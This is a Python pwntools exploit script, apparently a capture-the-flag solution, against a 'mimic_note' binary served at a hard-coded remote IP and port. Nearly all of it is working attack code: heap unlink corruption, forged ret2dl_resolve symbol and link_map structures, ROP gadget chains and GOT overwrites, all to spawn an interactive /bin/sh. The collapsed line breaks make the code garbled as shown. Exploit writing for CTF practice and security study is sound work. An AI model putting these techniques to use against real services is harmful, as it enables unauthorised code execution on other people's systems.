from pwn import * import os import struct import random import time import sys import signal
salt = os.getenv('GDB_SALT') if (os.getenv('GDB_SALT')) else ''
def clear(signum=None, stack=None): print('Strip all debugging information') os.system('rm -f /tmp/gdb_symbols{}* /tmp/gdb_pid{}* /tmp/gdb_script{}*'.replace('{}', salt)) os._exit(0)
execve_file = './mimic_note_64'
sh = remote('45.32.120.212', 6666)
try: gdbscript = ''' set $ptr = (char *)¬es define pr x/8gx $ptr+0x40 end
define prr x/8wx $ptr end # b *0x4006E0 b dl-runtime.c:83 '''
f = open('/tmp/gdb_pid{}'.replace('{}', salt), 'w') f.write(str(proc.pidof(sh)[0])) f.close()
f = open('/tmp/gdb_script{}'.replace('{}', salt), 'w') f.write(gdbscript) f.close() except Exception as e: print(e)
def New(size): sh.sendafter('>> ', '1'.ljust(31, '\0')) sh.sendafter('size?\n', str(size).ljust(31, '\0')) def delete(index): sh.sendafter('>> ', '2'.ljust(31, '\0')) sh.sendafter('index ?\n', str(index).ljust(31, '\0'))
def show(index): sh.sendafter('>> ', '3'.ljust(31, '\0')) sh.sendafter('index ?\n', str(index).ljust(31, '\0'))
def edit(index, content): sh.sendafter('>> ', '4'.ljust(31, '\0')) sh.sendafter('index ?\n', str(index).ljust(31, '\0')) sh.sendafter('content?\n', content)
def exit(): sh.sendafter('>> ', '5'.ljust(31, '\0'))
cmd = '/bin/sh 1>&2 \0'
notes_x86 = 0x0804A060 notes_x64 = 0x6020A0
New(0xfc) New(0xfc) New(0xfc) New(0xfc)
New(0xf8) New(0xf8) New(0xf8) New(0xf8)
edit(1, (p32(0) + p32(0xf8 | 1) + p32(notes_x86 + 8 - 12) + p32(notes_x86 + 8 - 8)).ljust(0xf8, 'a') + p32(0xf8))
edit(5, (p64(0) + p64(0xf1) + p64(notes_x64 + 0x50 - 0x18) + p64(notes_x64 + 0x50 - 0x10)).ljust(0xf0, 'b') + p64(0xf0))
delete(2) delete(6)
rel_plt_addr_x86 = 0x080483c8 dynsym_addr_x86 = 0x080481d8 dynstr_addr_x86 = 0x080482c8
fake_elf32_sym = dynsym_addr_x86 + 0x2570 rel_offset_x86 = (fake_elf32_sym-8) - rel_plt_addr_x86 str_func_x86 = fake_elf32_sym + 0x10 r_info_x86 = (int((fake_elf32_sym - dynsym_addr_x86)/0x10) << 8) + 7 log.info('r_info_x86: ' + hex(r_info_x86)) st_name_x86 = str_func_x86 - dynstr_addr_x86
edit(1, p32(0) + p32(fake_elf32_sym - 8) + p16(0x400)) layout_dl_resolve_x86 = [ p32(0x804A014), p32(r_info_x86), p32(st_name_x86), p32(0), p32(0) , p32(0x12), ] edit(0, flat(layout_dl_resolve_x86) + 'system\0'.ljust(0x10, '\0') + cmd)
edit(1, p32(0) + p32(0x804ac00) + p16(0x400)) layout_x86 = [ p32(0), p32(0x8048440), p32(rel_offset_x86),
p32(0), p32(fake_elf32_sym + 0x20), ] edit(0, flat(layout_x86))
fake_link_map_x64 = 0x602020
fake_link_map_layout_x64 = [ '\0' * 0x8, p64(fake_link_map_x64 + 0x80), p64(fake_link_map_x64 + 0x80), p64(0), p64(5), p64(fake_link_map_x64), '\0' * 0x68, p64(fake_link_map_x64 + 0x80), ]
edit(5, p64(0) + p64(fake_link_map_x64 + 0x68) + p16(0xf8)) edit(4, p64(fake_link_map_x64 + 0x118) + p64(fake_link_map_x64 + 0x118)[:7])
edit(5, p64(0) + p64(fake_link_map_x64 + 0xf8) + p16(0xf8)) edit(4, p64(fake_link_map_x64 + 0x118) + p64(0) * 3 + p64(5) + p64(fake_link_map_x64 + 0x118)[:7])
rel_plt_addr_x64 = fake_link_map_x64 + 0x118 dynsym_addr_x64 = fake_link_map_x64 + 0x118 dynstr_addr_x64 = fake_link_map_x64 + 0x118
rel_offset_x64 = ((0x602420 - rel_plt_addr_x64)/0x18) fake_elf64_sym = 0x602420+0x18 str_func_x64 = fake_elf64_sym + 0x18 r_info_x64 = (int((fake_elf64_sym - dynsym_addr_x64)/0x18) << 32) + 7 log.info('r_info_x64: ' + hex(r_info_x64)) st_name_x64 = str_func_x64 - dynstr_addr_x64
edit(5, p64(0) + p64(0x602420) + p16(0x400)) layout_dl_resolve_x64 = [ p64(0x355970), p64(r_info_x64), p64(0), 'aaaa', p8(0), p8(1), p16(0x12), p64(0xfffffffffffd5d00), p64(0) , ] edit(4, flat(layout_dl_resolve_x64).ljust(0x50, '\0') + cmd)
pop_rdi_ret_x64 = 0x0000000000400c33
pop_rbp_ret_x64 = 0x0000000000400770
leave_ret_x64 = 0x00000000004008b7
pop_rsi_r15_ret_x64 = 0x0000000000400c31
pop_ebp_ret_x86 = 0x080489fb
leave_ret_x86 = 0x08048568
puts_plt_x64 = 0x400670 read_plt_x64 = 0x4006B0
atoi_got_addr_x86 = 0x804A030 free_got_addr_x86 = 0x804A014 atoi_got_addr_x64 = 0x602058
edit(5, p64(0) + p64(0x602c00) + p16(0x400)) layout_x64 = [ p64(0),
p64(pop_rdi_ret_x64), p64(0), p64(pop_rsi_r15_ret_x64), p64(atoi_got_addr_x64), p64(0), p64(read_plt_x64),
p64(pop_rdi_ret_x64), p64(0x400CF3), p64(puts_plt_x64),
p64(0x400A64),
p64(pop_rdi_ret_x64), p64(0x400CF3), p64(puts_plt_x64),
p64(0x400A64),
p64(0x400AFE),
p64(pop_rdi_ret_x64), p64(0x400C71), p64(puts_plt_x64),
p64(0x400AFE),
p64(0x400AFE), p64(0x400AFE), p64(0x400AFE), p64(0x400AFE), p64(0x400AFE), p64(0x400AFE),
p64(pop_rdi_ret_x64), p64(0x602420 + 0x50),
p64(0x400656), p64(fake_link_map_x64), p64(rel_offset_x64), ] edit(4, flat(layout_x64))
edit(1, p32(0) + p32(notes_x86 + 8 * 8) + p8(0xfc)) edit(0, p32(free_got_addr_x86) + p8(0xfc)) edit(5, p64(0) + p64(notes_x64 + 0x10 * 8) +p8(0xf8)) edit(4, p64(atoi_got_addr_x64 - 4) + p8(0xf8))
edit(8, p32(0x080489fa) + p64(pop_rdi_ret_x64)[:7])
sh.sendafter('>> ', (p64(pop_rbp_ret_x64) + p64(0x602c00) + p64(leave_ret_x64)).ljust(31, '\0') + p64(0x0000000000400639)) sh.recvuntil('>> ')
sh.sendafter('>> ', '2'.ljust(8, '\0') + p32(0x080489f9) + p32(0) + p32(0) + p32(0x804ac00) + p32(leave_ret_x86))
sh.sendafter('index ?\n', '0\0')
sh.interactive() clear()
|